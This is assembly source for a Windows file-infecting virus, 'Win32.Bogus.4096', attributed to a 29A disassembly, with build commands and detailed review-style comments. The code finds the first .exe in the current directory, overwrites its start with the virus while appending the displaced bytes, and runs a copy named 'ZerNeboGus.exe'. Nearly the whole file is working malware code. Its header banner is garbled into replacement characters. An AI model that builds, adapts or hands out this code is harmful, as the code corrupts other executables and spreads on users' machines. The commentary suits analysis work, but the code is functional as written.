comment *
Win32.Bogus.4096 <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Disassembly by <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD>
Darkman/29A <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD>
Win32.Bogus.4096 is a 4096-byte runtime/direct-action EXE virus. Infects
first file in current directory, when executed, by prepending the virus to
the original EXE file.
Compile Win32.Bogus.4096 with Turbo Assembler v 5.0 by typing:
TASM32 /M /ML /Q BOGUS.ASM
TLINK32 -Tpe -c -x -aa -r BOGUS.OBJ,,, IMPORT32
*
.386
.model flat

; KERNEL32.dll imports (stdcall; resolved through the IMPORT32 library named
; on the TLINK32 line in the header). Note for the reader: ExitProcess is
; declared here but never called anywhere in this file — after the final
; WinExec call below, execution simply runs past code_end.
extrn ExitProcess:proc
extrn FindFirstFileA:proc
extrn WinExec:proc
extrn _lclose:proc
extrn _llseek:proc
extrn _lopen:proc
extrn _lread:proc
extrn _lwrite:proc
extrn CopyFileA:proc
.data

MAX_PATH equ 0ffh ; NOTE(analysis): the Win32 MAX_PATH is 260 (104h). With 0ffh
                  ; the cFileName member of WIN32_FIND_DATA below is 5 bytes
                  ; shorter than the API's, so FindFirstFileA writes 5 bytes past
                  ; the end of FindFileData (into the szFileName bytes that
                  ; follow it in .data)
FALSE equ 00h ; bFailIfExists argument of CopyFileA: an existing target file is
              ; overwritten
OF_READWRITE equ 02h ; _lopen access mode: opens the file for reading and
                     ; writing
SW_SHOW equ 05h ; WinExec uCmdShow: activates the window and displays it
                ; in its current size and position
; 64-bit file time split into two DWORDs, matching the Win32 FILETIME
; layout. Used only as members of WIN32_FIND_DATA below; the code never
; reads these fields.
FILETIME struct
dwLowDateTime DWORD ? ; Low-order 32 bits of the file time
dwHighDateTime DWORD ? ; High-order 32 bits of the file time
FILETIME ends
; Mirror of the Win32 WIN32_FIND_DATAA layout. cFileName is sized with this
; file's MAX_PATH (0ffh) instead of the API's 260, so the structure is
; 5 bytes smaller than what FindFirstFileA fills in. cFileName is the only
; member the code reads (it is passed to _lopen).
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; File attributes of the file found
ftCreationTime FILETIME <> ; Time the file was created
ftLastAccessTime FILETIME <> ; Time the file was last accessed
ftLastWriteTime FILETIME <> ; Time the file was last written to
nFileSizeHigh DWORD ? ; High-order DWORD of the file size, in bytes
nFileSizeLow DWORD ? ; Low-order DWORD of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?) ; Null-terminated name of the file found
                               ; (255 bytes here, 260 in the real API)
cAlternate BYTE 0eh dup(?) ; Null-terminated alternative (short) name for
                           ; the file
ends
FindFileData WIN32_FIND_DATA <> ; Filled by FindFirstFileA; its cFileName is
                                ; the file opened into ESI in the code below.
                                ; Declared 5 bytes short of the API structure
                                ; (see MAX_PATH), so the call spills into the
                                ; bytes that follow
szFileName db '*.exe',00h ; Search pattern for FindFirstFileA; lies directly
                          ; after FindFileData in .data
szNewFileName db 'ZerNeboGus.exe',00h ; Name the running module is copied to
                                      ; (CopyFileA), then rewritten in the
                                      ; loop and started with WinExec. This
                                      ; is the on-disk artifact the code
                                      ; leaves in the working directory
cBuffer db ? ; One-byte transfer buffer; every _lread/_lwrite in the loop
             ; moves exactly one byte
cBuffer_ db ? ; One-byte transfer buffer for the second byte in flight per
              ; loop pass
.code

;-----------------------------------------------------------------------
; code_begin — program entry point (named in 'end code_begin').
; Flat 32-bit code calling stdcall KERNEL32 imports: arguments are pushed
; right to left and no return value is ever tested.
;
; Sequence, as read from the calls in this block:
;   1. EDI = [esp+10h], treated as the running module's path; scan it and
;      overwrite the matched byte with '.'.
;   2. FindFirstFileA("*.exe") fills FindFileData; cFileName is the target.
;   3. CopyFileA(module path -> "ZerNeboGus.exe"), existing file overwritten.
;   4. _lopen target -> ESI, _lopen copy -> EDI.
;   5. 1000h loop iterations, one byte per _lread/_lwrite (see
;      read_write_loop).
;   6. _lclose(EDI); WinExec("ZerNeboGus.exe"); execution then runs off
;      code_end — ExitProcess is imported but never called.
;
; Register roles across the block:
;   EDI  pointer to the module path, later the handle of ZerNeboGus.exe
;   ESI  handle of the *.exe found by FindFirstFileA (never closed)
;   EBX  current byte offset, 0..0FFFh
;   EBP  EBX - 1000h: the same offset measured back from end of file
;   EAX  return values, not tested anywhere
; The FindFirstFileA search handle is discarded (FindClose is not imported).
;-----------------------------------------------------------------------
code_begin:
lea edi,[esp+10h] ; EDI = pointer to buffer for module path. Only the
                  ; stack layout at process entry makes this a path;
                  ; nothing in the code writes it. NOTE(review): loader-
                  ; specific, confirm for the intended Windows version
push edi ; Keep the path pointer; scasb advances EDI
repne scasb ; Scan for the byte in AL. Neither AL nor ECX is set in this
            ; file, so the scan uses whatever the loader left in them.
            ; EDI stops one past the matched byte
mov byte ptr [edi-01h],'.' ; Overwrite the matched byte with '.'
pop edi ; EDI = pointer to buffer for module path again

push offset FindFileData ; lpFindFileData: address of returned information
push offset szFileName ; lpFileName: "*.exe" (relative, current directory)
call FindFirstFileA ; Search handle in EAX is dropped; only
                    ; FindFileData.cFileName is used afterwards

push FALSE ; bFailIfExists = FALSE: overwrite if it already exists
push offset szNewFileName ; lpNewFileName: "ZerNeboGus.exe"
push edi ; lpExistingFileName: module path from above
call CopyFileA ; Copies the running module; result unchecked

push OF_READWRITE ; iReadWrite: open for reading and writing
push offset FindFileData.cFileName ; lpPathName: first *.exe found
call _lopen
mov esi,eax ; ESI = handle of the found file (HFILE_ERROR not tested)

push OF_READWRITE ; iReadWrite: open for reading and writing
push offset szNewFileName ; lpPathName: "ZerNeboGus.exe"
call _lopen
mov edi,eax ; EDI = handle of the copy (HFILE_ERROR not tested)

xor ebx,ebx ; EBX = byte offset, counts 0..0FFFh
mov ebp,0fffff000h ; EBP = -1000h: same offset relative to end of file,
                   ; incremented in step with EBX

; One byte per iteration, 1000h iterations. Per iteration:
;   a. target[EBX]           -> cBuffer
;   b. copy[EBX]             -> cBuffer_
;   c. cBuffer_              -> target[EBX]      (overwrite)
;   d. cBuffer               -> end of target    (append)
;   e. copy[end-1000h+EBX]   -> cBuffer
;   f. cBuffer               -> copy[EBX]
; Net effect after the loop: the target's first 1000h bytes are replaced
; by the copy's first 1000h bytes and the displaced target bytes are
; appended to the target; the copy's first 1000h bytes are replaced by
; its own last 1000h bytes (presumably undoing the same displacement on
; the copy — inferred from the symmetry, not stated in the code).
; Every call is unchecked; a short read leaves the previous byte in the
; one-byte buffer and it is written anyway.
read_write_loop:
push 00h ; iOrigin = 0: offset from start of file
push ebx ; lOffset = EBX
push esi ; hFile = target
call _llseek

push 01h ; uBytes = 1
push offset cBuffer ; lpBuffer: receives target byte at EBX
push esi ; hFile = target
call _lread

push 00h ; iOrigin = 0: offset from start of file
push ebx ; lOffset = EBX
push edi ; hFile = copy
call _llseek

push 01h ; uBytes = 1
push offset cBuffer_ ; lpBuffer: receives copy byte at EBX
push edi ; hFile = copy
call _lread

push 00h ; iOrigin = 0: offset from start of file
push ebx ; lOffset = EBX
push esi ; hFile = target
call _llseek

push 01h ; uBytes = 1
push offset cBuffer_ ; lpBuffer: copy byte, written over target[EBX]
push esi ; hFile = target
call _lwrite

push 02h ; iOrigin = 2: offset from end of file
push 00h ; lOffset = 0 -> position at end of file
push esi ; hFile = target
call _llseek

push 01h ; uBytes = 1
push offset cBuffer ; lpBuffer: original target byte, appended at end
push esi ; hFile = target
call _lwrite

push 02h ; iOrigin = 2: offset from end of file
push ebp ; lOffset = EBX - 1000h (negative)
push edi ; hFile = copy
call _llseek

push 01h ; uBytes = 1
push offset cBuffer ; lpBuffer: receives copy byte at end-1000h+EBX
push edi ; hFile = copy
call _lread

push 00h ; iOrigin = 0: offset from start of file
push ebx ; lOffset = EBX
push edi ; hFile = copy
call _llseek

push 01h ; uBytes = 1
push offset cBuffer ; lpBuffer: that byte, written to copy[EBX]
push edi ; hFile = copy
call _lwrite

inc ebx ; Next byte offset
inc ebp ; Keep EBP = EBX - 1000h
cmp bx,1000h ; Done after 1000h bytes. The 16-bit compare suffices:
             ; EBX starts at 0 and rises by 1, so it hits 1000h exactly
jne read_write_loop

push edi ; hFile = copy. The target handle in ESI is never closed
call _lclose

push SW_SHOW ; uCmdShow: show the window in its current size and position
push offset szNewFileName ; lpCmdLine: "ZerNeboGus.exe"
call WinExec ; Starts the rewritten copy. No ExitProcess follows: once
             ; WinExec returns, execution continues past code_end
code_end:

end code_begin